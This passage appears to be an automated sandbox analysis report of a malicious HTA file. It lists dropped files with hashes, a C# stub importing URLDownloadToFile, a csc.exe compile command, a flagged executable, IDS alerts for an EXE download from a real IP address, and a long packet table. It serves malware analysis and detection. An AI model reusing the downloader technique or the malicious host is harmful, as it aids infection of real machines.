Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.e.m.0.s.v.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.k.e.m.0.s.v.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
Category:	dropped
Size (bytes):	484
Entropy (8bit):	3.7418199850495144
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuoJB9MupBQXReKJ8SRHy4H2wcmu1F/hlQy:V/DTLDfuzXfHywiSy
MD5:	10497F06BE49912089C836BC86234B00
SHA1:	B5B39581911F94A2F18B32D97A2AFF6508BB3795
SHA-256:	0B0CB42E066B9A8AA70188EF9F5F208CDEE33E7E34C5066175F5024F6E3F75A5
SHA-512:	BC250718C0B0A7CA210AED686BD8BC0EDBFC409213B1105BA57D26AB5C511C5A6D5A108CB9E8F0C0BE80872FB4282A925243BC0E45A5AABBE4F544465FEADFC3
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace Dw.{. public class sVHWxaBap. {. [DllImport("uRLmon.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr mNghWxVygB,string vTPVT,string db,uint Bn,IntPtr RgqsqrZDdiB);.. }..}.

C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.215381696947785
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fxOHzxs7+AEszIcNwi23fxOC:p37Lvkmb6KwZWWZEJZr
MD5:	92FF4BEF03C25290987877CDE8B12DF8
SHA1:	38FFA45640840370CB1A66E3DDCF93348EF6E462
SHA-256:	6E90736CF0185168B7542EFA9085BD32DD16970795CF71451AF734C52666EE8B
SHA-512:	CE9465A507A58853AC6EBE846136FF1F98A033AC8E9F420BF3F89B50390B0CC0819E04FEB8A114F5F202991FD2A496FB22742739C1D6920D6FC6EED8CAD1FC3D
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.0.cs"

C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.826298617753817
Encrypted:	false
SSDEEP:	24:etGSfsPBe5ekrl8cAOkDlnqbttu3gtkZfPpzCbCZ0WI+ycuZhN6QakSLVPNnq:6Lskr+rtncu3HJPpObCZX1ul3a3rq
MD5:	B6AE6D6FA017FDA0F6623523AC350636
SHA1:	A3602615BA3E3F8BE7F62D20CC3F8950FD7E9EBF
SHA-256:	5F517C1BD07764FF7A9F505823B98F64D110BBBEB090FC65BEDE7D56C1A4ED33
SHA-512:	BD8A01B6551CFAB94D5CBA1F3AA5BB20701AEE67F53AA703095AF89D600227F03F56DB960D787531B6CBEBF1188A1B36EFFD9DED202D7DDA2ED3F72024D4816B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U..g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....v.....v...........................!.............. ;.....P ......M.........S.....^.....d.....g.....j...M.....M...!.M.....M.......!............;.......................................$..........<Module>.dk

C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (458), with CRLF, CR line terminators
Category:	modified
Size (bytes):	879
Entropy (8bit):	5.287026054359993
Encrypted:	false
SSDEEP:	24:Kwqd3ka6KgnEvqKax5DqBVKVrdFAMBJTH:xika67nEvqK2DcVKdBJj
MD5:	9EFCE7E6F851D751EA85980ABD05CB1A
SHA1:	C6CCACAEDBFFE19FDFF3A633F844E22B32CB6C54
SHA-256:	348003C13A2CE5F489440EC2F83F9A19519C0F450EF3F19C557F0F93E88EBB0A
SHA-512:	180655F6B6338F6171E36D57F520A90C4115924C125AAD22D7E8478B5E65FDD5619B6442CB0F9588D24FD86D84A73F5AFE45E3DE71B379AA9FB82C52D4A7651E
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\reindulging

Download File

Process:	C:\Users\user\AppData\Roaming\cossess.exe
File Type:	data
Category:	modified
Size (bytes):	93696
Entropy (8bit):	6.89841748961477
Encrypted:	false
SSDEEP:	1536:2tMSzw9YY7EAphU8R5E+ri2foGIm6drWTGbMruvrFN2lePDQnJWR:eMa1GhtR5ERsczdsCzD20PDQnJWR
MD5:	330B848E48D1306D3A75883C2B7E5A20
SHA1:	BCD10014D7E929E19AE2A179625A16831F0D9956
SHA-256:	083A1CEB3D2BE2106CBF8BDB1F25AC87CD060F37D7F6197614A64088BE6E9923
SHA-512:	7DB3F65D7010DFC77034EB0A20C3FF08A481A05E27D13D099D4D9D57020194FC223A266623BF92D2ACA74EBB51F79DC90C4074898B31D94397299D9FC42B4922
Malicious:	false
Preview:	{l.61OXA=YCF..FX.SNLM87I.11MVP66P62OXA9YCFQXFXCSNLM87IF11MVP.6P6<P.O9.J.p.G..r.$$K.94^V?7=.U1X\ ,a[<c4$6f1-s....Z&"T.@[Z.6P62OXAi.CF.YEX.=..M87IF11M.P47[7bOX%8YCNQXFXCS..L87iF11.WP66.62oXA9[CFUXFXCSNLK87IF11MV.76P42OXA9YAF1.FXSSN\M87IV11]VP66P6"OXA9YCFQXFX..OL.87IF.0M.U66P62OXA9YCFQXFXCSN.L8;IF11MVP66P62OXA9YCFQXFXCSNLM87IF11MVP66P62OXA9YCFQXFxCSFLM87IF11MVP>.P6zOXA9YCFQXFXm'+4987I.S0MVp66PR3OXC9YCFQXFXCSNLM8.IFQ.?%"U6P6.JXA9.BFQ^FXC5OLM87IF11MVP66.62.v3\5,%QXJXCSN.L87KF11!WP66P62OXA9YCF.XF.CSNLM87IF11MVP66.3OXA9Y.FQXDXFS2.M8..F12MVPl6P0..XA.YCFQXFXCSNLM87IF11MVP66P62OXA9YCFQXFXCSNLM8.4.>...9E..62OXA9XAEU^NPCSNLM87I811M.P66.62OoA9YfFQX+XCSjLM8IIF1OMVPR6P6@OXAXYCF.XFX,SNL#87I811MHR.)P68e~A;qcFQRFr. oLM2.HF15>tP6<.42O\2.YCL.[FXG jLM2.MF15>sP6<.32O\kcY@.G^FXX<vLM27J.$7MVK..P4.vXA3Yi`Q[.MESNWg.7K.81MRz`EM62Ip.9YI2XXFZ.YNLI.)Knr1M\z.HC62KsA.{=RQXBsCyl2X87Mm1.o(F66T.2ez?.YCBzXl^i1N>.479E^PMVV..P68g.A9_ClkX8VCSJN".7IL..wVxf6P02g.A9_Cl.X8kCSJ`JF.IF5.[(a66T.47XA?*.FQRc.pSNHe.7IL1..Vxo6P02g.A9_

C:\Users\user\AppData\Roaming\cossess.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	982016
Entropy (8bit):	6.877802594216076
Encrypted:	false
SSDEEP:	24576:Ou6J33O0c+JY5UZ+XC0kGso6FaN+C2p2dfWY:Au0c++OCvkGs9FaN+CO2IY
MD5:	9A772B3531C6426C3DB9CD09AE1B8576
SHA1:	699254A62E9A8CE5D4C9DBCFC080C7291BC1B0E5
SHA-256:	34EE12E5FF7384703F2A7043D0A839C89CB5D918BDD359422561BFA18D66F0A5
SHA-512:	D3401A8A1BBE570B2DF67DEBAEA4AA091FE1904B39671F1716E3D4A79A4C97F5337466BFEDA020824356547671CBFF9B07B8C5C931D8FBB6171B13CEEE20EBF2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L......g.........."..................}............@..........................p......@.....@...@.......@.....................L...\|....p...s.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....s...p...t..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (15814), with CRLF line terminators
Entropy (8bit):	2.095057222137154
TrID:	HyperText Markup Language (15015/1) 100.00%
File name:	niceworkingskillgivenmebest.hta
File size:	15'983 bytes
MD5:	b373d0e25e733942a4f8e7b60d2e1efb
SHA1:	48461b4400a6fbe3956062479f566a09e3fb81c2
SHA256:	526e8c3e5935b935765705b0722305c780ced034b6760b997b87cad4bb4b665a
SHA512:	0eb9818e343c0b4cf263f4a974591c5e9c1a3c35f30846b4f7a93be2dae50adc8874ea42007546236d1e1706635ce0ac939fa862a4af81aadb2b80a50f46a019
SSDEEP:	48:3ip+OoNop+fwMoN6M3v9Njq5py8fXTV5Sp+IoVp+XpJ+CoNbCp+kPG:ygpNog2Nz3vqxfXTV8gHgSNGgk+
TLSH:	6072535CAC90FD559BA8E94469CCA9DADC8E0B39C0803B0373DC7A121388B6D49E42D7
File Content Preview:	<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<SCrIpt TypE="TexT/vBsCript">..dIm..............................................................................................................................

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-17T01:18:59.386361+0100	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	198.12.89.24	80	192.168.2.7	49681	TCP
2025-03-17T01:18:59.478632+0100	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	198.12.89.24	80	192.168.2.7	49681	TCP
2025-03-17T01:19:08.293433+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49682	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 01:18:58.897979021 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:58.903192997 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:58.904040098 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:58.904217958 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:58.909432888 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.385960102 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.385971069 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.385982990 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.385993958 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.386003017 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.386013031 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.386023998 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.386075974 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.386075020 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.386143923 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.386154890 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.386360884 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.386372089 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.386409044 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.392090082 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.392102957 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.392116070 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.392127037 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.392163992 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.392218113 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.392496109 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.392544985 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.474015951 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474035025 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474072933 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.474114895 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.474157095 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474169016 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474180937 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474190950 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474200010 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.474221945 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.474258900 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.474888086 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474906921 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474917889 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474948883 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.474952936 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.474977970 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.475002050 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.475735903 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.475748062 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.475789070 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.476162910 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.476174116 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.476185083 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.476195097 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.476228952 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.476249933 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.476929903 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.476979971 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.476989985 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.477000952 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.477030993 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.477056026 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.477793932 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.477806091 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.477828979 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.477840900 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.477848053 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.477873087 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.477900982 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.478631973 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.479155064 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.562227011 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562237024 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562324047 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.562364101 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562376022 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562401056 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562414885 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562422991 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.562426090 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562446117 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562457085 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.562459946 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.562483072 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.562500000 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.563163996 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563210964 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.563266039 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563277960 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563296080 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563307047 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563316107 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.563322067 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563333035 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563340902 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.563344955 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.563369036 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.563394070 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.564126968 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564138889 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564150095 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564176083 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.564191103 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.564192057 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564205885 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564218044 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564229012 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564233065 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.564258099 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.564284086 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.564960003 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564970970 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.564989090 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565000057 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565011978 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565013885 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.565026999 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565038919 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565042019 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.565052986 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.565078020 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.565865040 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565881014 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565892935 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565908909 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.565912008 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565923929 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565936089 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565937042 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.565951109 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.565967083 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.565984964 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.566791058 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.566803932 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.566814899 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.566826105 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.566838026 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.566848040 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.566848993 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.566863060 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.566934109 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.566934109 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.566934109 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.567629099 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.567640066 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.567655087 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.567666054 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.567678928 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.567706108 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650418043 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650444984 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650455952 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650466919 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650474072 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650485992 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650487900 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650520086 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650537014 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650549889 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650557041 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650562048 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650576115 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650587082 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650595903 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650599957 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650624037 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650646925 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650826931 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650847912 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650860071 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650870085 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650882959 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.650891066 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.650928020 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.651005030 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651031017 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651065111 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.651072025 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.651077986 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651089907 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651118994 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.651134014 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.651139975 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651151896 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651163101 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651171923 CET	80	49681	198.12.89.24	192.168.2.7
Mar 17, 2025 01:18:59.651192904 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.651217937 CET	49681	80	192.168.2.7	198.12.89.24
Mar 17, 2025 01:18:59.651335001 CET	80	49681	198.12.89.24	192.168.2.7
